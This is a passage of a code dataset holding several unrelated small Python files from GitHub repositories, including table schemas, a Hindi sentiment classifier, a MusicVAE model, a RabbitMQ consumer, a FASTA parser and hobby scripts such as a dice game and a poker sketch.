String(60)),\n \"mostx\": Column(\"mostx\", String(80)),\n \"mpresnr\": Column(\"mpresnr\", String(10)),\n \"motypid\": Column(\"motypid\", String(2)),\n \"pernr\": Column(\"pernr\", String(10)),\n \"erdat\": Column(\"erdat\", DateTime(timezone=False)),\n \"storn\": Column(\"storn\", String(1)),\n \"stusr\": Column(\"stusr\", String(10)),\n \"stdat\": Column(\"stdat\", DateTime(timezone=False)),\n \"stoid\": Column(\"stoid\", String(15))\n },\n \"fcrb.monitoring_params\": {\n \"id\": Column(\"id\", Integer, primary_key=True),\n \"patnr\": Column(\"patnr\", BigInteger),\n \"falnr\": Column(\"falnr\", String(10)),\n \"vppid\": Column(\"vppid\", String(15)),\n \"pernr\": Column(\"pernr\", String(10)),\n \"vbem\": Column(\"vbem\", String(150)),\n \"datyp\": Column(\"datyp\", DateTime(timezone=False)),\n \"wertogr\": Column(\"wertogr\", String(20)),\n \"wertugr\": Column(\"wertugr\", String(20)),\n \"wertmax\": Column(\"wertmax\", String(20)),\n \"wertmin\": Column(\"wertmin\", String(20))\n },\n \"fcrb.order_entry\": {\n \"id\": Column(\"id\", Integer, primary_key=True),\n \"idodr\": Column(\"idodr\", String(10)),\n \"einri\": Column(\"einri\", String(10)),\n \"falnr\": Column(\"falnr\", String(10)),\n \"patnr\": Column(\"patnr\", BigInteger),\n \"pernr\": Column(\"pernr\", String(12)),\n \"erdat\": Column(\"erdat\", DateTime(timezone=False)),\n \"orgid\": Column(\"orgid\", String(8))\n },\n \"fcrb.patient_address\": {\n \"id\": Column(\"id\", Integer, primary_key=True),\n \"patnr\": Column(\"patnr\", BigInteger),\n \"pstlz\": Column(\"pstlz\", String(10)),\n \"stras\": Column(\"stras\", String(50)),\n \"land\": Column(\"land\", String(15)),\n \"ort\": Column(\"ort\", String(20)),\n \"deck\": Column(\"deck\", String(15)),\n \"adrnr\": Column(\"adrnr\", String(5))\n },\n \"fcrb.patient\": {\n \"id\": Column(\"id\", Integer, primary_key=True),\n \"patnr\": Column(\"patnr\", BigInteger),\n \"gschl\": Column(\"gschl\", String(1)),\n \"nname\": Column(\"nname\", String(30)),\n \"vname\": Column(\"vname\", String(30)),\n \"gbdat\": Column(\"gbdat\", DateTime(timezone=False)),\n \"gbnam\": Column(\"gbnam\", String(30)),\n \"namzu\": Column(\"namzu\", String(5)),\n \"glrand\": Column(\"glrand\", String(20)),\n \"famst\": Column(\"famst\", String(10)),\n \"telf1\": Column(\"telf1\", String(15)),\n \"rvnum\": Column(\"rvnum\", String(20))\n },\n \"fcrb.professional\": {\n \"id\": Column(\"id\", Integer, primary_key=True),\n \"pernr\": Column(\"pernr\", String(10)),\n \"erusr\": 
Column(\"erusr\", String(12)),\n \"orgid\": Column(\"orgid\", String(8)),\n \"gbdat\": Column(\"gbdat\", DateTime(timezone=False)),\n \"begdt\": Column(\"begdt\", DateTime(timezone=False)),\n \"enddt\": Column(\"enddt\", DateTime(timezone=False)),\n \"erdat\": Column(\"erdat\", DateTime(timezone=False)),\n \"rank\": Column(\"rank\", String(3))\n },\n \"fcrb.vital_signs\": {\n \"id\": Column(\"id\", Integer, primary_key=True),\n \"idvs\": Column(\"idvs\", String(10)),\n \"patnr\": Column(\"patnr\", BigInteger),\n \"falnr\": Column(\"falnr\", String(10)),\n \"vppid\": Column(\"vppid\", String(15)),\n \"dttyp\": Column(\"dttyp\", String(10)),\n \"erdat\": Column(\"erdat\", DateTime(timezone=False)),\n \"typevs\": Column(\"typevs\", String(9)),\n \"vwert\": Column(\"vwert\", String(7)),\n \"vbem\": Column(\"vbem\", String(150))\n }\n}","repo_name":"SkinnyPigeon/new_dv_tests","sub_path":"refactored/tables/fcrb_table_definitions.py","file_name":"fcrb_table_definitions.py","file_ext":"py","file_size_in_byte":6096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43567907516","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[3]:\n\n\nimport pandas as pd\nimport codecs\nfrom nltk.tokenize import word_tokenize\nfrom sklearn.metrics.classification import accuracy_score\nfrom sklearn.metrics import f1_score\n\n\n# In[4]:\n\n\nimport warnings\nwarnings.filterwarnings('ignore')\n\n\n# In[5]:\n\n\ndata = pd.read_csv(\"HindiSentiWordnet.txt\", delimiter=' ')\n\nfields = ['POS_TAG', 'ID', 'POS', 'NEG', 'LIST_OF_WORDS']\ndf = data.head()\ndf\n\n\n# In[6]:\n\n\nwords_dict = {}\nfor i in data.index:\n print (data[fields[0]][i], data[fields[1]][i], data[fields[2]][i], data[fields[3]][i], data[fields[4]][i])\n\n words = data[fields[4]][i].split(',')\n for word in words:\n words_dict[word] = (data[fields[0]][i], data[fields[2]][i], data[fields[3]][i])\n\n\n# In[7]:\n\n\ndef sentiment(text):\n words = word_tokenize(text)\n votes = []\n pos_polarity = 0\n neg_polarity = 0\n \n allowed_words = ['a','v','r','n']\n for word in words:\n if word in words_dict:\n \n pos_tag, pos, neg = words_dict[word]\n #print(word, pos_tag, pos, neg)\n \n if pos_tag in allowed_words:\n if pos > neg:\n pos_polarity += pos\n votes.append(1)\n elif neg > pos:\n neg_polarity += neg\n votes.append(0)\n\n pos_votes = votes.count(1)\n neg_votes = votes.count(0)\n if pos_votes > neg_votes:\n return 1\n elif neg_votes > pos_votes:\n return 0\n else:\n if pos_polarity < neg_polarity:\n return 0\n else:\n return 1\n \n\n\n# In[12]:\n\n\npred_y = []\nactual_y = []\n\npos_reviews = codecs.open(\"pos_hindi.txt\", \"r\", encoding='utf-8', errors='ignore').read()\nfor line in pos_reviews.split('$'):\n data = line.strip('\\n')\n if data:\n pred_y.append(sentiment(data))\n actual_y.append(1)\n\nprint(len(actual_y))\nneg_reviews = codecs.open(\"neg_hindi.txt\", \"r\", encoding='utf-8', errors='ignore').read()\nfor line in neg_reviews.split('$'):\n data=line.strip('\\n')\n if data:\n pred_y.append(sentiment(data))\n actual_y.append(0)\nprint(len(actual_y))\nprint(\"Accuracy=\", accuracy_score(actual_y, pred_y) * 100)\nprint('F-measure: ',f1_score(actual_y,pred_y))\n\n\nif __name__ == '__main__':\n sentiment1=sentiment(\" फिल्म की कास्टिंग जबरदस्त है\")\n if sentiment1==1:\n print(\"Sentiment is positive\")\n else:\n print(\"Sentiment is negative\")\n\n\n# In[ ]:\n\n\n\n\n\n# In[ 
]:\n\n\n\n\n","repo_name":"imrs29/Hindi-News-text-summarization-and-sentiment-analysis-using-natural-language-processing","sub_path":"Sentiment.py","file_name":"Sentiment.py","file_ext":"py","file_size_in_byte":2539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41356853943","text":"#!/usr/bin/env python\nimport rospy\nfrom ci_tools.simulation_control import SimulationControl\nfrom ci_tools.helpers.ci_log import CiLog\n\n\nclass HectorSimulationControl(SimulationControl):\n \"\"\"Class for controlling the simulation with Hector Tracker setup.\"\"\"\n\n def __init__(self):\n \"\"\"Initialize variables, then start sim with behavior.\"\"\"\n super(HectorSimulationControl, self).__init__()\n self._mission_behavior = \"\"\n\n self.read_ros_additional_ros_params()\n self.import_finalizers()\n\n self.start_sim()\n self.start_behavior(self._mission_behavior)\n CiLog.info(\"Initialization finished. Starting timer\")\n self.start_simulation_timer()\n\n\n\n def read_ros_additional_ros_params(self):\n \"\"\"Reads additional ROS parameters that are not considered by SimulationControl.read_ros_additional_ros_params().\"\"\"\n mission_behavior_full_param_name = rospy.search_param('mission_behavior')\n self._mission_behavior = str(rospy.get_param(mission_behavior_full_param_name))\n","repo_name":"tu-darmstadt-ros-pkg/hector_ci_tools","sub_path":"src/hector_ci_tools/hector_simulation_control.py","file_name":"hector_simulation_control.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14343222882","text":"from PIL import Image\r\n \r\nim1 = Image.open('451116c6-17a8-452a-b7b8-ebff1b6a2bed.jfif')\r\ndef comand_type(string, flag,tag):\r\n\r\n tof=0 # tof=true or false\r\n i=0\r\n while i < len(tag):\r\n c=0\r\n while c < len(tag[i]):\r\n if str(tag[i][c]) in string:\r\n tof=1\r\n break\r\n else: c+=1\r\n if tof == 1: break\r\n else :i+=1\r\n if tof == 0: rezult= \"no\"\r\n else: rezult=flag[i]\r\n\r\n return rezult\r\n","repo_name":"Cergol/voice_assistant","sub_path":"helper/calcul.py","file_name":"calcul.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22526348647","text":"'''\nFunction to determine if a substring k exists in a string s.\nIf k exists in s, return the index of the char in s that k starts.\nIf k doesn't exist inside of s, return -1. 
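\nExample: substr('hellothere', 'other') returns 4 (the match begins at index 4),\nwhile substr('hellothere', 'hella') returns -1.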
\nNote: implement from scratch, cannot use built in substring function.\n'''\nimport time\nclass Solution:\n # O(len(s)) time, O(1) space\n def substr(self, s, k):\n i = 0; j = 0\n m = False # stores whether there was a previous match\n while i < len(s) and j < len(k):\n if s[i] == k[j]:\n j += 1\n m = True\n else:\n if m:\n j = 0\n i -= 1\n m = False\n i += 1\n \n if j >= len(k):\n return i-len(k)\n return -1\n \n def test1(self):\n s = \"hellothere\"\n k = \"other\"\n res = self.substr(s, k)\n print(\"res: \", res)\n\n def test2(self):\n s = \"hellothere\"\n k = \"hella\"\n res = self.substr(s, k)\n print(\"res: \", res)\n\ns = Solution()\ns.test1()\n#s.test2()\n \n\n \n","repo_name":"mcxu/code-sandbox","sub_path":"PythonSandbox/src/misc/substring.py","file_name":"substring.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"42867006982","text":"import abc\n\nfrom magenta.contrib import training as contrib_training\nimport tensorflow.compat.v1 as tf\nimport tensorflow_probability as tfp\nimport tf_slim\n\nds = tfp.distributions\n\n\nclass BaseEncoder(object, metaclass=abc.ABCMeta):\n\n @property\n @abc.abstractmethod\n def output_depth(self):\n pass\n\n @abc.abstractmethod\n def build(self, hparams, is_training=True):\n pass\n\n @abc.abstractmethod\n def encode(self, sequence, sequence_length):\n pass\n\n\nclass BaseDecoder(object, metaclass=abc.ABCMeta):\n\n @abc.abstractmethod\n def build(self, hparams, output_depth, is_training=True):\n pass\n\n @abc.abstractmethod\n def reconstruction_loss(self, x_input, x_target, x_length, z=None, c_input=None):\n pass\n\n @abc.abstractmethod\n def sample(self, n, max_length=None, z=None, c_input=None):\n pass\n\n\nclass MusicVAE(object):\n\n def __init__(self, encoder, decoder):\n self._encoder = encoder\n self._decoder = decoder\n\n def build(self, hparams, output_depth, is_training):\n tf.logging.info('Building MusicVAE model with %s, %s, and hparams:\\n%s',\n self.encoder.__class__.__name__,\n self.decoder.__class__.__name__, hparams.values())\n self.global_step = tf.train.get_or_create_global_step()\n self._hparams = hparams\n self._encoder.build(hparams, is_training)\n self._decoder.build(hparams, output_depth, is_training)\n\n @property\n def encoder(self):\n return self._encoder\n\n @property\n def decoder(self):\n return self._decoder\n\n @property\n def hparams(self):\n return self._hparams\n\n def encode(self, sequence, sequence_length, control_sequence=None):\n \"\"\"인코더가 입력 데이터를 입력받아 mu와 sigma를 계산하는 함수\"\"\"\n hparams = self.hparams\n z_size = hparams.z_size\n\n sequence = tf.to_float(sequence)\n if control_sequence is not None:\n control_sequence = tf.to_float(control_sequence)\n sequence = tf.concat([sequence, control_sequence], axis=-1)\n encoder_output = self.encoder.encode(sequence, sequence_length)\n\n mu = tf.layers.dense(\n encoder_output,\n z_size,\n name='encoder/mu',\n kernel_initializer=tf.random_normal_initializer(stddev=0.001))\n sigma = tf.layers.dense(\n encoder_output,\n z_size,\n activation=tf.nn.softplus,\n name='encoder/sigma',\n kernel_initializer=tf.random_normal_initializer(stddev=0.001))\n\n return ds.MultivariateNormalDiag(loc=mu, scale_diag=sigma)\n\n def _compute_model_loss(self, input_sequence, output_sequence, sequence_length, control_sequence):\n \"\"\"forward 후 loss 계산\"\"\"\n hparams = self.hparams\n batch_size = hparams.batch_size\n\n input_sequence = tf.to_float(input_sequence)\n output_sequence = 
tf.to_float(output_sequence)\n\n max_seq_len = tf.minimum(tf.shape(output_sequence)[1], hparams.max_seq_len)\n input_sequence = input_sequence[:, :max_seq_len]\n\n if control_sequence is not None:\n control_depth = control_sequence.shape[-1]\n control_sequence = tf.to_float(control_sequence)\n control_sequence = control_sequence[:, :max_seq_len]\n control_sequence.set_shape([batch_size, None, control_depth])\n\n # decoder input, target 전처리\n x_target = output_sequence[:, :max_seq_len]\n x_input = tf.pad(output_sequence[:, :max_seq_len - 1], [(0, 0), (1, 0), (0, 0)])\n x_length = tf.minimum(sequence_length, max_seq_len)\n\n\n if hparams.z_size:\n # latent vector 추출\n q_z = self.encode(input_sequence, x_length, control_sequence)\n z = q_z.sample() # \n\n # 사전분포 p(z)\n p_z = ds.MultivariateNormalDiag(loc=[0.] * hparams.z_size, scale_diag=[1.] * hparams.z_size)\n\n # regularization term in ELBO \n kl_div = ds.kl_divergence(q_z, p_z)\n\n\n else:\n kl_div = tf.zeros([batch_size, 1], dtype=tf.float32)\n z = None\n\n # decoder forward 및 loss 계산\n # reconstruction term in ELBO\n r_loss, metric_map = self.decoder.reconstruction_loss(x_input, x_target, x_length, z, control_sequence)[0:2]\n\n # free bits in Eq.4\n # threshold 이상인 경우만 kl_loss 적용\n free_nats = hparams.free_bits * tf.math.log(2.0)\n kl_cost = tf.maximum(kl_div - free_nats, 0)\n\n # beta-VAE in Eq.3\n # beta(beta < 1)를 곱함으로써 kl_loss 비중 감소\n beta = ((1.0 - tf.pow(hparams.beta_rate, tf.to_float(self.global_step))) * hparams.max_beta)\n self.loss = tf.reduce_mean(r_loss) + beta * tf.reduce_mean(kl_cost)\n\n scalars_to_summarize = {\n 'loss': self.loss,\n 'losses/r_loss': r_loss,\n 'losses/kl_loss': kl_cost,\n 'losses/kl_bits': kl_div / tf.math.log(2.0),\n 'losses/kl_beta': beta,\n }\n return metric_map, scalars_to_summarize\n\n\n def train(self, input_sequence, output_sequence, sequence_length, control_sequence=None):\n _, scalars_to_summarize = self._compute_model_loss(input_sequence, output_sequence, sequence_length, control_sequence)\n\n hparams = self.hparams\n lr = ((hparams.learning_rate - hparams.min_learning_rate) *\n tf.pow(hparams.decay_rate, tf.to_float(self.global_step)) +\n hparams.min_learning_rate)\n\n optimizer = tf.train.AdamOptimizer(lr)\n\n tf.summary.scalar('learning_rate', lr)\n for n, t in scalars_to_summarize.items():\n tf.summary.scalar(n, tf.reduce_mean(t))\n\n return optimizer\n\n\n def eval(self, input_sequence, output_sequence, sequence_length, control_sequence=None):\n metric_map, scalars_to_summarize = self._compute_model_loss(input_sequence, output_sequence, sequence_length, control_sequence)\n\n for n, t in scalars_to_summarize.items():\n metric_map[n] = tf.metrics.mean(t)\n\n metrics_to_values, metrics_to_updates = (\n tf_slim.metrics.aggregate_metric_map(metric_map))\n\n for metric_name, metric_value in metrics_to_values.items():\n tf.summary.scalar(metric_name, metric_value)\n\n return list(metrics_to_updates.values())\n\n\n def sample(self, n, max_length=None, z=None, c_input=None, **kwargs):\n if z is not None and int(z.shape[0]) != n:\n raise ValueError(\n '`z` must have a first dimension that equals `n` when given. '\n 'Got: %d vs %d' % (z.shape[0], n))\n\n if self.hparams.z_size and z is None:\n tf.logging.warning('Sampling from conditional model without `z`. 
Using random `z`.')\n normal_shape = [n, self.hparams.z_size]\n normal_dist = tfp.distributions.Normal(\n loc=tf.zeros(normal_shape), scale=tf.ones(normal_shape))\n z = normal_dist.sample()\n\n return self.decoder.sample(n, max_length, z, c_input, **kwargs)\n\n\ndef get_default_hparams():\n return contrib_training.HParams(\n max_seq_len=32, # Maximum sequence length. Others will be truncated.\n z_size=32, # Size of latent vector z.\n free_bits=0.0, # Bits to exclude from KL loss per dimension.\n max_beta=1.0, # Maximum KL cost weight, or cost if not annealing.\n beta_rate=0.0, # Exponential rate at which to anneal KL cost.\n batch_size=512, # Minibatch size.\n grad_clip=1.0, # Gradient clipping. Recommend leaving at 1.0.\n clip_mode='global_norm', # value or global_norm.\n grad_norm_clip_to_zero=10000,\n learning_rate=0.001, # Learning rate.\n decay_rate=0.9999, # Learning rate decay per minibatch.\n min_learning_rate=0.00001, # Minimum learning rate.\n )\n","repo_name":"yongsun-yoon/music-vae","sub_path":"base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":7933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18292904660","text":"import pika, time, json\nfrom dotenv import dotenv_values\nfrom pymongo import MongoClient\n\nconfig = dotenv_values(\".env\")\nclient = MongoClient(config['MONGODB_ENDPOINT'],\n username=config['MONGODB_USERNAME'],\n password=config['MONGODB_PASSWORD'])\ndb = client.tododb\n\ndef queue_process_function(msg):\n #print(\" processing\")\n print(\" [x] Received \" + str(msg))\n\n data_string = msg.decode(\"utf-8\")\n data_string_json = data_string.replace(\"'\", \"\\\"\")\n data = json.loads(data_string_json)\n #print(data)\n\n post_id = db.payments.insert_one(data).inserted_id\n #print()\n\n #time.sleep(5) # delays for 5 seconds\n print(\"processing finished \" + post_id);\n return;\n\n# Access the CLODUAMQP_URL environment variable and parse it (fallback to localhost)\nqueue_endpoint = config['AMQP_URL']\nparams = pika.URLParameters(queue_endpoint)\nconnection = pika.BlockingConnection(params)\nchannel = connection.channel() # start a channel\nchannel.queue_declare(queue=config['QUEUE_WORKLOAD']) # Declare a queue\n\n# create a function which is called on incoming messages\ndef callback(ch, method, properties, body):\n queue_process_function(body)\n\n# set up subscription on the queue\nchannel.basic_consume(config['QUEUE_WORKLOAD'],\n callback,\n auto_ack=True)\n\n# start consuming (blocks)\nchannel.start_consuming()\nconnection.close()\n","repo_name":"fase-5-grupo-h/challenge-sap-cienci","sub_path":"consumer/consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41025588941","text":"import random\r\n\r\nnumber = [1,2,3,4,5,6]\r\ndef dice():\r\n while True:\r\n computer = random.choice(number)\r\n print('주사위를 굴리세요. ', computer)\r\n click = input('다시 굴리시겠습니까? 
')\r\n if click == 'yes':\r\n continue\r\n elif click == 'no':\r\n print('수고하셨습니다.')\r\n break\r\ndice()\r\n","repo_name":"seyeonyy/project_python","sub_path":"dice.py","file_name":"dice.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74750397866","text":"def strong(n):\n add=0\n while n!=0:\n rem=n%10\n fact=1\n for i in range(1,rem+1):\n fact*=i\n add+=fact\n n//=10\n return add\nn=145\nif n==strong(n):\n print('strong ')\nelse:\n print('not strong')\n\n\ndef fact(n):\n fact=1\n for i in range(1,n+1):\n fact*=i\n return fact\n\ndef strong(n,c):\n add=0\n while n!=0:\n rem=n%10\n add+=fact(rem)\n n//=10\n return add==c\nn=145\nif strong(n,c):\n print('strong')\nelse:\n print('not strong')\n","repo_name":"Shashivardhan3/python_1","sub_path":"fn stronng number.py","file_name":"fn stronng number.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19770465167","text":"from enum import Enum \n#import numpy as np\n\nclass Suit(Enum):\n HEART = 1\n SPADE = 2\n DIAMOND = 3\n CLUB = 4\n\nclass Rank(Enum):\n ONE = 1,\n TWO = 2,\n THREE = 3,\n FOUR = 4,\n FIVE = 5,\n SIX = 6,\n SEVEN = 7,\n EIGHT = 8\n NINE = 9,\n TEN = 10,\n JACK = 11\n QUEEN = 12\n KING = 13\n ACE = 14\n\nclass TopRowRoyalty(Enum):\n PAIR66 = 1\n PAIR77 = 2\n PAIR88 = 3\n PAIR99 = 4\n PAIRTT = 5\n PAIRJJ = 6\n PAIRQQ = 7\n PAIRKK = 8\n PAIRAA = 9\n SET222 = 10\n SET333 = 11\n SET444 = 12\n SET555 = 13\n SET666 = 14\n SET777 = 15\n SET888 = 16\n SET999 = 17\n SETTTT = 18\n SETQQQ = 20\n SETKKK = 21\n SETAAA = 22\n \nclass MiddleRowRoyalty(Enum):\n TRIPS = 2\n STRAIGHT = 4\n FLUSH = 8\n FULLHOUSE = 12\n QUADS = 20\n STRAIGHTFLUSH = 30\n ROYALFLUSH = 50\n\nclass BottomRowRoyalty(Enum):\n STRAIGHT = 4\n FLUSH = 4\n FULLHOUSE = 6\n QUADS = 10\n STRAIGHTFLUSH = 15\n ROYALFLUSH = 25\n\n\nclass Card:\n def __init__(self, Suit, Rank):\n self.suit = Suit.name\n self.rank = Rank.name\n print(self.suit + \" \" + self.rank)\n\n#need to initialize\n#draw, shuffle\nclass Deck:\n def __init__(self):\n self.cards = []\n\n def shuffle(self):\n for suit in list(Suit):\n print(suit)\n for rank in list(Rank):\n new_card = Card(suit, rank)\n self.cards.append(new_card)\n\n\nclass Hand:\n def __init__(self):\n self.cards = []\n \n #def draw(self):\n\n\nclass Board:\n def __init__(self):\n #board is 2x5 and 1x3, treated as 3x5 for now\n #self.cards = [[0]*5]*3\n self.top_row = [0]*3\n self.middle_row = [0]*5\n self.bottom_row = [0]*5\n \n def calculate_value(self):\n return 0 \n\n \n\nclass Player:\n def __init__(self, name):\n self.name = name\n self.board = Board()\n self.hand = Hand()\n self.points = 0\n\n \n\nclass Game:\n def __init__(self):\n self.deck = Deck()\n self.deck.shuffle()\n\n #game can have two or three players\n #input here should come externally?\n player_one = Player(\"Joe\")\n player_two = Player(\"Steve\")\n self.players = []\n self.players.append(player_one)\n self.players.append(player_two)\n\n #players place cards for the round\n #move into separate test file eventually\n \n #print_board(players)\n\n def deal(self):\n counter = 0\n for i in range(5):\n for player in self.players:\n player.hand.cards.append(self.deck.cards[counter])\n counter += 1 \n\n def print_board(self):\n for player in self.players:\n print(\"player hand: \" + player.name)\n for card in player.hand.cards:\n print(\"card: \" + card.suit)\n print(\"rank: 
\" + card.rank)\n\n print(\"player board: \")\n print(\"top row\")\n for card in player.board.top_row:\n self.print_card(card)\n \n print(\"middle row\")\n for card in player.board.middle_row:\n self.print_card(card)\n \n print(\"bottom row\")\n for card in player.board.bottom_row:\n self.print_card(card)\n\n def print_card(self, card):\n if(type(card) == int):\n print(\"no card\")\n else: \n print(\"card: \" + card.rank + \" \" +card.suit)\n #print(\"rank: \" + card.rank)\n \n #player number, range from 0-2, 0-3, need to add something for row management\n #card_index is of range 0-4, reduces by one for each card played\n #player can only play \n def play_card(self, player_number, card_index, col):\n print(self.players[player_number].hand.cards)\n self.players[player_number].board.top_row[col] = self.players[player_number].hand.cards.pop(card_index) \n\n \ngame = Game()\n\ngame.deal()\n\ngame.print_board()\n \ngame.play_card(1, 1, 1)\n\ngame.print_board()\n\ngame.play_card(2, 2, 2)\n\n\n#def deal(hands deck)\n\n\n\n#Each player has a hand and a board\n#class Player:\n\n \n# print(type(Suit.HEART.name))\n\n# print(list(Suit))\n\n# print(list(Rank))\n\n# woof = Card(Suit.HEART, Rank.ACE)\n\n# print(\"woof\" + woof.rank)\n\n# print(\"woof2\" + woof.suit)\n\n# woofwoof = Deck()\n\n# woofwoof.shuffle()\n\n# for card in woofwoof.cards:\n# print(\"suit \" + card.suit + \" rank \" + card.rank)\n\n#print(list(woofwoof.cards))","repo_name":"vigjo/ofc-poker","sub_path":"src/ofc.py","file_name":"ofc.py","file_ext":"py","file_size_in_byte":4507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30502408538","text":"import hashlib\nimport itertools\nimport os\nimport re\nimport types\n\nIDTYPES = set(\"dbj emb gb gi ref pir prf sp pdb pat bbs lcl gnl sha1\".split())\n\ndef parse(data, stream=False):\n if isinstance(data, types.StringTypes):\n reader = Reader.fromstring(data)\n else:\n reader = Reader(iter(data))\n while True:\n yield Record(reader, stream=stream) \n\ndef parse_file(path):\n with open(path) as handle:\n for rec in parse(handle):\n yield rec\n\nclass Record(object):\n def __init__(self, handle, stream=False):\n hdr = handle.nextheader()\n self.meta = Record.parse_defline(hdr)\n if not stream:\n hstr = HashStream(handle)\n self.sequence = ''.join(hstr)\n self.hash = hstr.hash()\n else:\n self.seqiter = HashStream(handle)\n self.hash = property(lambda self: self.seq.hash())\n\n @property\n def id(self):\n \"Primary identifier for this record.\"\n return self.meta[\"ids\"][0]\n \n @property\n def desc(self):\n \"Primery description of this record.\"\n return self.meta[\"desc\"][0]\n\n @staticmethod\n def parse_defline(data):\n if data[:1] != \">\":\n raise ValueError(\"Invalid header has no '>': %s\" % header)\n headers = data[1:].split('\\x01')\n ret = {\"ids\": [], \"desc\": []}\n for h in headers:\n bits = h.split(None, 1)\n ident, desc = bits[0], None\n if len(bits) > 1:\n desc = bits[1].strip()\n for sid in Record.parse_id(ident):\n if sid not in ret[\"ids\"]:\n ret[\"ids\"].append(sid)\n if desc not in ret[\"desc\"]:\n ret[\"desc\"].append(desc)\n return ret\n \n @staticmethod\n def parse_id(data):\n if data.find(\"|\") < 0: return [data]\n bits = data.split(\"|\")\n ret = []\n while len(bits):\n idtype = bits.pop(0)\n curr = []\n while len(bits) and bits[0] not in IDTYPES:\n curr.append(bits.pop(0))\n ret.append((idtype, '|'.join(filter(None, curr))))\n return ret\n\nclass Reader(object):\n def __init__(self, stream):\n 
self.stream = itertools.ifilter(Reader.skipblank, stream)\n self.header = None\n\n def __iter__(self):\n return self\n\n @staticmethod\n def skipblank(line):\n return bool(line.strip())\n \n @staticmethod\n def from_string(strdata):\n def _ter(data):\n prev = 0\n next = data.find(\"\\n\")\n while next >= 0:\n yield data[prev:next]\n prev, next = next, data.find(\"\\n\", next+1)\n yield data[prev:]\n return Reader(_iter(strdata))\n\n def nextheader(self):\n if self.header is not None:\n ret, self.header = self.header, None\n return ret\n line = self.stream.next().lstrip()\n if not line[:1] == \">\":\n raise ValueError(\"Invalid definition line: %s\" % line)\n return line\n\n def next(self):\n if self.header:\n raise StopIteration\n line = self.stream.next().lstrip()\n if line[:1] == \">\":\n self.header = line\n raise StopIteration\n return line\n\nclass HashStream(object):\n def __init__(self, stream):\n self.stream = stream\n self.sha = hashlib.sha1()\n self.exhausted = False\n \n def __iter__(self):\n return self\n \n def next(self):\n if self.exhausted:\n raise StopIteration\n try:\n data = self.stream.next().strip()\n except StopIteration:\n self.exhausted = True\n raise\n self.sha.update(data)\n return data\n \n def hash(self):\n return self.sha.hexdigest().upper()\n\n\n","repo_name":"ekspiulo/nebfa","sub_path":"nebfa.py","file_name":"nebfa.py","file_ext":"py","file_size_in_byte":3834,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"6250175628","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom matplotlib.ticker import MultipleLocator\nimport math\n\nwith open(\"./settings.txt\", \"r\") as settings_file:\n settings_data = [float(num) for num in settings_file.read().split(\"\\n\")]\n\ndata_arr = np.loadtxt(\"./data.txt\", dtype=int)\n\nvolt_step = settings_data[1]\ntime_step = settings_data[0]\n\nvolt_arr = data_arr * volt_step\ntime_arr = np.arange(0, len(data_arr)) * time_step\n\nvolt_max = np.max(volt_arr)\nvolt_max_ind = np.argmax(volt_arr)\ntime_max = np.max(time_arr)\ntime_max_ind = np.argmax(time_arr)\n\ncharge_data = [time_arr[0:volt_max_ind:], volt_arr[0:volt_max_ind:]]\ndischarge_data = [time_arr[volt_max_ind::], volt_arr[volt_max_ind::]]\n\nfigure, axes = plt.subplots(figsize = (16, 10), dpi = 400)\n\naxes.set_xlabel(\"Time, s\", fontsize = 16)\naxes.set_ylabel(\"Voltage, V\", fontsize = 16)\naxes.set_title(\"Capacitor charge-discharge graph in RC-circuit\", fontsize = 20)\n\ncharge_plot_line , = axes.plot(charge_data[0], charge_data[1], color = 'blue')\ndischarge_plot_line, = axes.plot(discharge_data[0], discharge_data[1], color = 'red')\n\ncharge_plot_line.set_label(\"Capacitor charge\")\ndischarge_plot_line.set_label(\"Capacitor discharge\")\naxes.legend(prop={\"size\":16})\n\nx_limits = (0.0, math.ceil(time_max))\ny_limits = (0.0, 3.5)\naxes.set(xlim = x_limits, ylim = y_limits)\n\naxes.xaxis.set_minor_locator(MultipleLocator(0.5))\naxes.xaxis.set_major_locator(MultipleLocator(1.0))\naxes.yaxis.set_minor_locator(MultipleLocator(0.25))\naxes.yaxis.set_major_locator(MultipleLocator(0.5))\naxes.grid(color = \"blue\", which = \"both\", linestyle = ':', linewidth = 0.5)\n\ncharge_time = time_arr[volt_max_ind] - time_arr[0]\ndischarge_time = time_arr[-1] - time_arr[volt_max_ind]\n\naxes.axvline(x = charge_time, ymin=y_limits[0], ymax = volt_max/y_limits[1], color = 'green', linestyle='dashed')\naxes.axhline(y = volt_max, xmin=x_limits[0], xmax = charge_time/x_limits[1], color = 'green', 
